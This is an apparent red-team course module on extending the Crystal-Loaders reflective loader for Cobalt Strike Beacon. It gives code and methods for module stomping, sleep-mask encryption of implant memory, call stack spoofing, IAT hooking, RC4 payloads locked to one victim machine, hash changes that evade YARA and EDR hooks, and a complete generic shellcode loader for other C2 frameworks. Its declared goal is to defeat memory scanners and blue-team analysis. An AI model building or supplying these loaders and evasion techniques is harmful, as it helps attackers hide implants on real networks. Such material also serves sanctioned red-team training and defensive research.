Module 8: Extending Crystal-Loaders
The adaptation guide — module stomping, sleep mask integration, call stack spoofing, IAT hooking PICOs, guardrailed loaders, custom DFR resolvers, and porting the architecture beyond Cobalt Strike.
Module Objective
Crystal-Loaders is a proof of concept. As rasta-mouse stated, it demonstrates the BUD contract and Crystal Palace integration — not a production-ready implant. This module maps the extension points that Crystal-Loaders deliberately leaves open. By the end, you will understand seven concrete extension paths, the data structures each one touches, and the detection trade-offs each extension addresses.
1. What Crystal-Loaders Leaves on the Table
Crystal-Loaders is deliberately minimal. It proves the spec-driven PIC architecture works, but it ships without several capabilities that a production-grade loader would need. Each omission is an extension opportunity:
| Capability | Current Status | Extension Opportunity |
|---|---|---|
| Module stomping / overloading | Uses VirtualAlloc → private commit | File-backed MEM_IMAGE memory |
| Sleep mask | BUD tracking is set up but no sleep mask PIC is included | BUD-aware encrypt/decrypt cycle |
| Call stack spoofing | Not implemented | Draugr / ThreadStackSpoofer integration |
| IAT hooking PICO | No post-exploitation API interception | Hook loaded DLL IATs via Crystal Palace PICO |
| Guardrailing | Environment-locked decryption not included | Payload only decrypts on the correct target |
| Custom DFR resolvers | Default ROR13 + string resolution | Alternative hash algorithms, LdrLoadDll fallback |
| ETW / AMSI bypass | Not addressed | Patch or unhook telemetry providers |
| PE header cleanup | Beacon PE headers persist after load | Zero headers post-load to evade memory scanners |
The rest of this module walks through seven of these extensions in detail, showing what structures to modify, what code to change, and what detection vectors each extension addresses.
2. Extension 1 — Module Stomping
The single biggest detection surface in Crystal-Loaders today is that Beacon lives in private-commit executable memory allocated via VirtualAlloc. Tools like Moneta and pe-sieve specifically scan for MEM_PRIVATE + PAGE_EXECUTE* regions. Module stomping (also called module overloading) eliminates this by placing Beacon in file-backed MEM_IMAGE memory.
The Concept
Module Stomping Flow
DLL on disk
SEC_IMAGE flag
→ MEM_IMAGE
with Beacon
file-backed memory
- Instead of
VirtualAlloc(NULL, size, MEM_COMMIT, PAGE_READWRITE), load a legitimate but unused DLL from disk. - Use
NtCreateSectionwith theSEC_IMAGEflag to create a file-backed section object. - Map it into the process with
NtMapViewOfSection. - Overwrite the legitimate DLL's sections with Beacon's sections.
- The result: Beacon lives in MEM_IMAGE (file-backed) memory, defeating Moneta and pe-sieve's private-commit detection.
Code Changes to go()
C (Conceptual Diff)// Before (current Crystal-Loaders)
PBYTE dst = KERNEL32$VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
// After (module stomping)
// 1. Find a suitable sacrificial DLL (not loaded, large enough)
// 2. NtCreateSection with SEC_IMAGE
// 3. NtMapViewOfSection
// 4. Copy sections over the mapped DLL
Updating ALLOCATED_MEMORY
The BUD ALLOCATED_MEMORY structure tracks how each region was allocated. When switching to module stomping, you must update the allocation method so the sleep mask and other BUD consumers know they are dealing with file-backed memory:
C// Use METHOD_MODULESTOMP instead of METHOD_VIRTUALALLOC
region->CleanupInformation.AllocationMethod = METHOD_MODULESTOMP;
// or METHOD_NTMAPVIEW if using NtMapViewOfSection directly
The MODULESTOMP_INFO Structure
Beacon's beacon.h defines a structure for tracking module-stomped allocations:
C (beacon.h)typedef struct _MODULESTOMP_INFO {
HMODULE ModuleHandle;
} MODULESTOMP_INFO, *PMODULESTOMP_INFO;
This structure simply stores the module handle of the stomped DLL. BUD consumers (especially the sleep mask and cleanup routines) use the ModuleHandle to identify which loaded module was overwritten, enabling proper cleanup (e.g., unmapping the view) when the implant exits or the region is freed.
Sacrificial DLL Selection
The sacrificial DLL must meet two criteria: it must not already be loaded in the process (to avoid conflicts), and it must be large enough to contain the Beacon payload. Common choices include DLLs in C:\Windows\System32 that are large but rarely loaded, such as xpsservices.dll or dbghelp.dll. Choosing a DLL whose SizeOfImage closely matches Beacon's size reduces the amount of unused mapped memory, which itself can be a detection heuristic.
3. Extension 2 — Sleep Mask Integration
Crystal-Loaders populates the ALLOCATED_MEMORY structure with section-level tracking, but it does not include a sleep mask. A sleep mask PIC would use this BUD data to encrypt Beacon's memory sections during sleep and decrypt them before the next check-in.
The Sleep Mask Cycle
BUD-Aware Sleep Mask Flow
ALLOCATED_MEMORY from BUD — enumerate all tracked regions and sectionsMaskSection == TRUE: change permissions to RW via NtProtectVirtualMemorySystemFunction032)CreateTimerQueueTimer or waitable timer)Conceptual Implementation Using BUD
C (Sleep Mask - BUD Integration)// Conceptual sleep mask flow using BUD's ALLOCATED_MEMORY
for (int r = 0; r < 6; r++) {
ALLOCATED_MEMORY_REGION * region = &bud->allocatedMemory->AllocatedMemoryRegions[r];
if (region->Purpose == PURPOSE_EMPTY) continue;
for (int s = 0; s < 8; s++) {
ALLOCATED_MEMORY_SECTION * sec = ®ion->Sections[s];
if (!sec->MaskSection || sec->VirtualSize == 0) continue;
// Change to RW so we can encrypt in place
DWORD oldProtect;
NtProtectVirtualMemory(
NtCurrentProcess(),
&sec->BaseAddress,
&sec->VirtualSize,
PAGE_READWRITE,
&oldProtect
);
// Encrypt the section contents
xor_encrypt(sec->BaseAddress, sec->VirtualSize, key);
}
}
The Ekko-Style Timer Queue Pattern
The Ekko sleep obfuscation technique uses CreateTimerQueueTimer to queue ROP-style callbacks that change memory permissions, encrypt, sleep, decrypt, and restore — all without the Beacon thread being active during the sleep window. Adapting Ekko for BUD means replacing Ekko's hardcoded memory ranges with the ALLOCATED_MEMORY regions tracked by BUD.
Why BUD Makes This Easier
Without BUD, a sleep mask must discover Beacon's memory layout at runtime — scanning the VAD, searching for PE headers, or using hardcoded offsets. BUD provides the exact base address, size, and permissions of every section in a structured array. The sleep mask just iterates the array. This is the design intent behind ALLOCATED_MEMORY — it is the contract between the loader and the sleep mask.
4. Extension 3 — Call Stack Spoofing
Even with LibGate's indirect syscalls routing execution through ntdll, the return stack still reveals that the calling code lives in private memory. A full call stack walk shows:
Call Stack (Anomalous)ntdll!NtAllocateVirtualMemory (syscall;ret gadget)
→ returns to 0x00007FF6`1A3C0842 ← loader PIC blob (PRIVATE memory!)
→ returns to 0x00007FF6`1A3C0210 ← still in PIC blob
→ ...
The return addresses in private memory are the anomaly. EDR stack walkers flag any frame that falls outside a file-backed module.
The Draugr Approach
The Draugr technique (covered in a separate course) creates synthetic stack frames that make the call stack look like it originates from legitimate system code. It uses JMP [RBX] gadget chaining with fake RUNTIME_FUNCTION and UNWIND_INFO structures so that the Windows unwinder produces a clean, believable stack trace.
The ThreadStackSpoofer Approach
A simpler alternative: before entering sleep, overwrite the return addresses on the current thread's stack with pointers into legitimate modules. On wake, restore the real return addresses. This defeats point-in-time stack scans during the sleep window.
Integration via Crystal Palace PICO
Crystal Kit demonstrated call stack spoofing as a PICO merged via Crystal Palace. The integration approach:
Call Stack Spoofing PICO Integration
mergelib directiveWhy This Is a PICO and Not Part of the Loader
Call stack spoofing is orthogonal to the loading process. It applies to every API call Beacon makes after loading, not just the loading phase. By packaging it as a PICO merged via mergelib, the spoofing logic is composable — you can include it or omit it per-spec without modifying the loader code itself.
5. Extension 4 — IAT Hooking PICO
Crystal Kit's most sophisticated extension was an IAT hooking PICO that intercepts specific API calls made by Beacon's loaded dependencies. This operates during and after the ProcessImports phase of LibTCG.
How It Works
- During
LoadDLL/ProcessImports, the PICO hooks the loaded DLL's IAT entries by replacing function pointers with addresses inside the PIC blob. - The PIC blob intercepts the call, adds evasion (call stack spoofing, argument sanitization), and then forwards to the real API.
- The hooking is invisible to Beacon — it calls APIs normally through its IAT, unaware that they are being intercepted.
Key Hook Targets
| Target API | Beacon Commands Affected | Evasion Purpose |
|---|---|---|
CreateProcessA/W | shell, run, powerpick | Wrap with call stack spoofing for child process creation |
LoadLibraryA/W | CLR/PowerShell commands | Intercept loads of clr.dll, System.Management.Automation.dll |
The LoadLibraryA/W hook is particularly important. When Beacon executes powerpick or execute-assembly, Windows loads the CLR and PowerShell automation DLLs. EDR products monitor for these loads (via PsSetLoadImageNotifyRoutine) as they strongly indicate offensive tooling. An IAT hook can intercept these loads and apply additional obfuscation or timing manipulation.
Complexity Warning
IAT hooking PICOs are the most complex extension on this list. The PIC blob must maintain its own trampolines for every hooked function, handle calling convention preservation, and ensure thread safety. Incorrect hooking can crash the Beacon process or produce unpredictable behavior. This is an advanced technique that requires deep understanding of x64 calling conventions and IAT structure.
6. Extension 5 — Guardrailed Loaders
Guardrailing ensures that a captured payload is useless outside the target environment. The Tradecraft Garden includes a simple_rdll_guardrail example demonstrating this concept, though Crystal-Loaders itself does not implement guardrailing. The full guardrail pattern works as follows:
The Guardrail Flow
Environment-Locked Payload Decryption
GetVolumeInformationA("c:\\"))SystemFunction033 using the derived keyImplementation (simple_rdll_guardrail pattern)
The simple_rdll_guardrail example in the Tradecraft Garden derives its key from the target machine's C: drive volume serial number and uses RC4 encryption via the undocumented SystemFunction033 export from advapi32.dll:
C (Link Time - Operator Workstation)// Obtain the target's C: volume serial (from recon)
DWORD targetSerial = ...; // e.g., 0xABCD1234
// Encrypt the Beacon DLL with RC4 using the serial as key material
RC4_Encrypt(beacon, beaconSize, &targetSerial, sizeof(DWORD));
C (Runtime - Target Host)// Re-derive the key from the current host's C: volume serial
DWORD volumeSerial = 0;
GetVolumeInformationA("c:\\", NULL, 0, &volumeSerial, NULL, NULL, NULL, 0);
// Decrypt via SystemFunction033 (RC4)
USTRING data = { beaconSize, beaconSize, encrypted };
USTRING key = { sizeof(DWORD), sizeof(DWORD), (PBYTE)&volumeSerial };
SystemFunction033(&data, &key);
// If wrong host: volumeSerial differs → RC4 produces garbage
// No valid PE signature → ParseDLL fails → loader exits cleanly
// No crash, no IOCs, no Beacon artifacts for blue team to analyze
Blue Team Impact
The critical benefit of guardrailing is not that it prevents execution — it prevents analysis. When a blue team captures a guardrailed payload and attempts to detonate it in a sandbox or reverse-engineer it on an analyst workstation, they get garbage. The Beacon DLL never materializes. There are no strings to extract, no configuration to decode, no C2 addresses to block. The payload is forensically inert outside the target environment.
7. Extension 6 — Custom DFR Resolvers
Crystal Palace's Dynamic Function Resolution system supports multiple resolver strategies. The spec file controls which strategy applies to which modules. The default Crystal-Loaders configuration uses ROR13 hashing, but the DFR system is designed to be customizable.
The Dual-Resolver Pattern
From rasta-mouse's "Arranging the PIC Parterre" blog post, the recommended pattern uses two resolvers:
Crystal Palace Specdfr "resolve_explicit" "ror13" "KERNEL32, NTDLL"
dfr "resolve_default" "strings"
| Resolver | Behavior | Use Case |
|---|---|---|
| resolve_explicit | Only walks already-loaded modules (EAT parsing). Never calls LoadLibrary. | KERNEL32 and NTDLL — guaranteed to be loaded in every process |
| resolve_default | Falls back to LoadLibraryA for modules not yet loaded. | All other DLLs that Beacon might need at runtime |
Advanced Resolver Modifications
- Substitute LdrLoadDll for LoadLibraryA:
LoadLibraryA(kernel32) is commonly hooked by EDRs. CallingLdrLoadDll(ntdll) directly bypasses kernel32 hooks while achieving the same result. - Custom hash algorithms: Replace ROR13 with CRC32, djb2, or a unique hash to avoid YARA rules that signature the ROR13 constant (
0x3CFA685D, defined asNTDLL_HASHin Crystal-Loaders'loader.c). - Proxy through threadpool: Route API calls through
TpAllocWork/TpPostWork/TpReleaseWorkthreadpool work items. The call stack then shows the Windows threadpool infrastructure rather than direct calls from the PIC blob.
Resolver Security Trade-Off
The explicit resolver is stealthier because it never triggers a PsSetLoadImageNotifyRoutine callback — it only reads modules already in the PEB. The default (LoadLibrary-based) resolver is more flexible but generates image load events that EDRs monitor. A well-designed loader uses explicit resolution for everything it can and only falls back to default for genuinely unloaded dependencies.
8. Extension 7 — Porting Beyond Cobalt Strike
Crystal Palace and the PIC architecture are not Cobalt Strike-specific. The core value — spec-driven PIC generation, LibTCG PE loading, LibGate indirect syscalls, DFR — is C2-framework agnostic. The Cobalt Strike coupling comes from only a few interfaces.
What You Would Need to Change
| CS-Specific Component | What to Remove / Replace |
|---|---|
beacon.h BUD structures | Create equivalent data-passing structures for your C2, or remove BUD entirely if not needed |
Three DllMain call protocol | Remove the DLL_BEACON_USER_DATA, DLL_PROCESS_ATTACH, DLL_BEACON_START sequence |
Aggressor .cna hooks | Replace with your C2's operator scripting interface (if any) |
| Post-Ex UDRL references | Adapt or remove post-exploitation loader if your C2 does not use child payload loading |
Potential Targets
- Mythic agents — Mythic's payload generation is already modular; Crystal Palace PIC output can be wrapped in a Mythic payload type
- Sliver implants — Sliver uses shellcode stagers; the PIC blob can serve as the shellcode payload
- Havoc agents — Havoc's Demon agent uses UDRL-style loading that maps directly to Crystal Palace concepts
- Custom C2 frameworks — Any framework that accepts shellcode or reflective DLL input
- Standalone shellcode runners — Use the PIC blob as a generic payload without any C2 framework
A Minimal Generic Loader
Stripped of all Cobalt Strike specifics, a Crystal Palace loader reduces to this core:
C (Generic Loader)void go(void)
{
// Get the embedded DLL and XOR key from the PIC's resource section
PRESOURCE dll = GETRESOURCE(_DLL_);
PRESOURCE key = GETRESOURCE(_KEY_);
// XOR unmask the embedded payload
PBYTE buf = VirtualAlloc(NULL, dll->length, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
for (DWORD i = 0; i < dll->length; i++)
buf[i] = dll->data[i] ^ key->data[i % key->length];
// Parse and load the DLL using LibTCG
DLLDATA dlldata;
ParseDLL(buf, &dlldata);
PBYTE dst = VirtualAlloc(NULL, SizeOfDLL(&dlldata), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
LoadDLL(&dlldata, dst);
ProcessImports(&dlldata, dst);
FixSectionPermissions(&dlldata, dst);
// Simple: just call DllMain directly
DLLMAIN_FUNC entry = (DLLMAIN_FUNC)EntryPoint(&dlldata, dst);
VirtualFree(buf, 0, MEM_RELEASE);
entry(dst, DLL_PROCESS_ATTACH, NULL);
}
This is the entire loading pipeline without BUD, without the three-call protocol, and without Aggressor integration. LibTCG, LibGate, and DFR all still function — only the Cobalt Strike handshake is removed. You can then add back whatever data-passing contract your C2 agent expects.
The Core Portable Components
| Component | Function | CS Dependency |
|---|---|---|
| Crystal Palace linker | Compiles COFF → PIC shellcode | None |
| LibTCG | PE parsing, loading, imports, relocations | None |
| LibGate | Indirect syscall execution | None |
| DFR | Dynamic function resolution at link time | None |
| mergelib / PICOs | Composable PIC module merging | None |
| BUD | Loader → agent data contract | CS-specific structures |
| Three-call DllMain | Agent initialization protocol | CS-specific protocol |
9. Detection & OPSEC Considerations
This table summarizes the detection posture of Crystal-Loaders in its current PoC state versus what becomes possible with the extensions described in this module:
| Detection Vector | Current Crystal-Loaders | With Extensions |
|---|---|---|
| Private-commit executable memory | Vulnerable — uses VirtualAlloc | Module stomping → file-backed MEM_IMAGE |
| PE headers in memory | Minimal — PIC blob has no PE headers, but loaded Beacon does | Header erasure post-load |
| RWX memory | Avoids — uses RW then RX per section | Same |
| Return address in private memory | LibGate indirect syscalls help (ntdll frame present) | Call stack spoofing eliminates anomalous frames |
| YARA on ROR13 constants | NTDLL_HASH (0x3CFA685D, from loader.c) visible in PIC | Custom hash algorithm obfuscates constants |
| ETW syscall telemetry | Kernel-level — cannot bypass from userland | N/A — kernel telemetry remains |
| Behavioral analysis | VirtualAlloc + VirtualProtect patterns | Module stomping changes the pattern entirely |
| Sleep mask detection | No sleep mask included | BUD-aware sleep mask encrypts during sleep |
| CLR / PowerShell image loads | Not addressed | IAT hooking PICO can intercept and obfuscate |
No Silver Bullet
Even with every extension implemented, certain detection vectors remain. Kernel-level ETW telemetry sees every syscall regardless of how it is invoked. Behavioral analysis can correlate process creation patterns, network traffic, and named pipe usage. Memory scanners are evolving to detect module stomping by comparing mapped sections against the on-disk DLL. The goal of these extensions is not to achieve permanent invisibility — it is to raise the cost of detection high enough that automated tools miss the implant, forcing defenders into expensive manual analysis.
10. Module Summary
Key Takeaways
- Crystal-Loaders is a PoC, not a production loader. Its value is demonstrating the architecture, not shipping a finished product.
- Module stomping replaces VirtualAlloc with file-backed MEM_IMAGE memory, eliminating the single biggest detection surface.
- Sleep mask integration leverages BUD's
ALLOCATED_MEMORYto encrypt Beacon sections during sleep without runtime memory discovery. - Call stack spoofing (Draugr/ThreadStackSpoofer) eliminates anomalous return addresses in private memory, packaged as a composable PICO.
- IAT hooking PICOs intercept Beacon API calls to add per-call evasion (stack spoofing, CLR load interception).
- Guardrailing ensures captured payloads are forensically inert outside the target environment.
- Custom DFR resolvers let you swap hash algorithms, avoid LoadLibrary hooks, and proxy through threadpool infrastructure.
- Porting beyond Cobalt Strike requires removing only BUD and the three-call DllMain protocol. The core PIC architecture (Crystal Palace, LibTCG, LibGate, DFR) is C2-agnostic.
Module 8 Quiz: Extending Crystal-Loaders
Q1: What allocation method should you use in ALLOCATED_MEMORY when implementing module stomping?
Q2: What is the primary benefit of guardrailed loaders?
simple_rdll_guardrail uses the C: drive volume serial number obtained via GetVolumeInformationA, then encrypts with RC4 via SystemFunction033. If the payload is captured and detonated in a sandbox or analyst workstation, the derived key will not match, and RC4 decryption produces garbage. The Beacon DLL never materializes, leaving no strings, configuration, or C2 addresses for blue team analysis. The payload is forensically inert outside the intended target.Q3: What Crystal Palace feature makes the PIC architecture portable beyond Cobalt Strike?